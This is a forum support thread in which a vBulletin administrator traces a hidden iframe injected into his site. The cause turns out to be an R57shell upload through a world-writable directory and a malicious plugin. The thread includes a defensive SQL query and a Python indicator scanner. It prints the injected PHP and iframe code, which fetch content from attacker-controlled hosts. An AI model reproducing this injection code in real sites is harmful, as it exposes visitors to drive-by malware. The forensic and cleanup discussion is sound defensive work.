Code inserted in to my templates.

  • DaveS (Member)

    Hi, I wonder if I could ask for some urgent help.
    I'm running vB 3.8.
    Someone has managed to add some code to my vB implementation that is calling a nasty script.
    However I can't see any changed PHP files or templates.
    Any ideas where I start with finding out what's happened here?

    HTML Code:
    <script type="text/javascript">
    <!--
    	// Main vBulletin Javascript Initialization
    	vBulletin_init();
    //-->
    </script>
    <iframe name="fra" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://koren.in/x/?id=766&hash=a25144ea1f7195206c5f614241cd4844"></iframe>
    The attached source shows where the nasty iframe is getting embedded.
    Any help much appreciated.
    Thanks
    Dave
  • DaveS (Member)

    #2
    Hi.
    Right I now know that $lol was placed in the footer template for a couple of styles that were live.
    I assume that $lol then inserts the IFRAME code. However I can't find anything that mentions $lol in the variables or how it could have been done.
    So although I've now removed $lol from the templates I need to find out where that is and also to find out where it's happened.
    It could be that one of the Administrators has had their account hacked; I can't see anything in the control panel logs.
    The site was hammered this morning for about 2 hours so I guess that could have been a dictionary attack trying to crack an Admins password?
    Any help appreciated!
    Cheers
    Dave


    • Lynne (Former vBulletin Support)

      #3
      Did you look through your access_logs? Look in your plugins? Run maintenance > diagnostics > suspect file versions and see if there is some strange file listed there.

      Please don't PM or VM me for support - I only help out in the threads.
      vBulletin Manual & vBulletin 4.0 Code Documentation (API)
      Want help modifying your vbulletin forum? Head on over to vbulletin.org
      If I post CSS and you don't know where it goes, throw it into the additional.css template.

      W3Schools <- awesome site for html/css help


      • DaveS (Member)

        #4
        Hi Lynne. Thank you for your reply.
        I have been looking over the various logs all day so far to see how this happened.

        Suspect file version - yes done the check. Nothing found.
        Access logs - Yes nothing in there.
        Looked in plugins - Nothing strange there.

        So I know that the template has been edited as taking out the added text has removed the malicious iframe code.

        I can't find the reference to $lol anywhere in vB and it must be in there somewhere.

        I think I may have been subject to an exploit as I'm not on the very latest version of 3.8. I will do that in a mo. I was going to go straight to vB4 but I'm not ready for 4 yet.


        • Lynne (Former vBulletin Support)

          #5
          Sorry, I'm not an expert on this sort of thing. Perhaps someone else can come along with more specifics on what to look for.


          • DaveS (Member)

            #6
            No. Thank you Lynne, any help is appreciated.
            We've just found the source. My own stupid fault.
            A very old directory with 777 permissions that was used to store pics in.
            An R57shell script has been uploaded and then it looks like it was used to break the MySQL password. Which was the outage earlier this morning, I assume.
            So any hacking was done via MySQL, with the template presumably edited from there.


            • DaveS (Member)

              #7
              I've found some more.... information.
              I've been searching the MySQL tables and have found the following in the vb_datastore table.
              However I'm not exactly sure what is in the datastore tables.
              I can see that there appear to be plugins.
              Can anyone help me?

              $domain = file_get_contents('http://kornoval.com:21/domain/tb.txt');
              $id = '766';
              $hash = 'a25144ea1f7195206c5f614241cd4844';
              $lol = "<iframe name=\"fra\" width=\"1\" height=\"1\" scrolling=\"no\" frameborder=\"no\" marginwidth=\"0\" marginheight=\"0\" src=\"http://$domain/x/?id=$id&hash=$hash\"></iframe>";


              • DaveS (Member)

                #8
                And found the plugin finally. The malicious code was in a plugin entitled......

                AME : Permission Hide


                • wtrk (Senior Member, 3.7.x)

                  #9
                  I'm having the same problem. I had the AME product installed and have now removed it. I can't find any $lol in the templates, but Google Webmaster Tools shows me a bunch of threads that are infected, so I'm deleting them now one by one to see if that fixes the problem.


                  • DaveS (Member)

                    #10
                    I don't think it's specifically the AME product. Any of them could have been chosen in my case to hide the infection.
                    I found running some SQL queries against the template or plugins table quite useful.
                    So like this....
                    Code:
                    SELECT * FROM vb_plugin WHERE phpcode LIKE "%$lol%";
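The same search idea carried a little further, as an added example that is not from this thread or from vBulletin: a small Python scan that runs a few narrow indicators taken from what this thread uncovered (a 1x1 hidden iframe, a remote file_get_contents() fetch, the stray $lol variable) over constructed rows standing in for vb_template and vb_plugin. The table names, row contents and the sample domain are assumptions; on a live site you would feed it the result of the SELECT above.

```python
import re

# Constructed sample rows modelled on what the thread found: a footer template
# carrying $lol, a plugin whose phpcode builds the 1x1 iframe from a remotely
# fetched domain, and two benign rows for contrast. Table and column layout
# (vb_template.template, vb_plugin.phpcode) is assumed from the thread.
SAMPLE_ROWS = [
    ("vb_template", "footer", "<div id=\"footer\">... </div>\n$lol"),
    ("vb_plugin", "AME : Permission Hide",
     "$domain = file_get_contents('http://malicious.example:21/domain/tb.txt');\n"
     "$lol = \"<iframe name=\\\"fra\\\" width=\\\"1\\\" height=\\\"1\\\" "
     "src=\\\"http://$domain/x/\\\"></iframe>\";"),
    ("vb_plugin", "Thread Tools", "$show['threadtools'] = true;"),
    ("vb_template", "header", "<div id=\"header\">$vboptions[bbtitle]</div>"),
]

# Each indicator is (label, regex). They are deliberately narrow to the pattern
# seen in this thread, not a general malware signature. The optional
# backslashes allow for quotes escaped inside a PHP double-quoted string.
INDICATORS = [
    ("hidden_iframe",
     re.compile(r'<iframe[^>]*\bwidth=\\?"?1\\?"?[^>]*\bheight=\\?"?1\\?"?', re.I)),
    ("remote_include",
     re.compile(r"file_get_contents\s*\(\s*['\"]https?://", re.I)),
    ("unknown_template_var", re.compile(r"\$lol\b")),
    ("eval_or_base64", re.compile(r"\b(eval|base64_decode)\s*\(", re.I)),
]


def scan_rows(rows):
    """Return [(table, name, [labels])] for every row hit by at least one indicator.

    rows is an iterable of (table, name, body) tuples, e.g. built from
    SELECT title, template FROM vb_template and SELECT title, phpcode FROM vb_plugin.
    """
    hits = []
    for table, name, body in rows:
        labels = [label for label, rx in INDICATORS if rx.search(body)]
        if labels:
            hits.append((table, name, labels))
    return hits


if __name__ == "__main__":
    for table, name, labels in scan_rows(SAMPLE_ROWS):
        print(f"{table}/{name}: {', '.join(labels)}")
```

A row flagged only by unknown_template_var is the template edit itself; a row that also trips remote_include or hidden_iframe is the plugin that defines the variable, which is where the thread eventually found it.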


                      • wtrk (Senior Member, 3.7.x)

                      #11
                      Were you able to remove the malicious code completely?

                      Google is still calling my site malicious. I submitted a thing through the Webmaster Tools to have it reviewed; does anybody know how long it takes?
                      Last edited by wtrk; Thu 25 Feb '10, 2:01pm.


                        • DaveS (Member)

                        #12
                        Originally posted by wtrk:
                        Were you able to remove the malicious code completely?

                        Google is still calling my site malicious. I submitted a thing through the Webmaster Tools to have it reviewed; does anybody know how long it takes?
                        Yes I was able to remove it all completely but it was hard work to identify.
                        My site was I think only compromised for a few hours so I'm sure that helped with Google not picking anything up. Checking the Webmaster tools now it says that it hasn't found any malware.
                        However, because my server has been compromised and I can't be sure what else has been done, I'm considering a full rebuild, just to be sure.
                        There's a definite lesson here in being careful in the use of 777 CHMOD'd directories! I had the attitude that it wouldn't really happen to me as my site is relatively small with 6000 uniques per day.
                        So I've learnt a lesson the hard way.
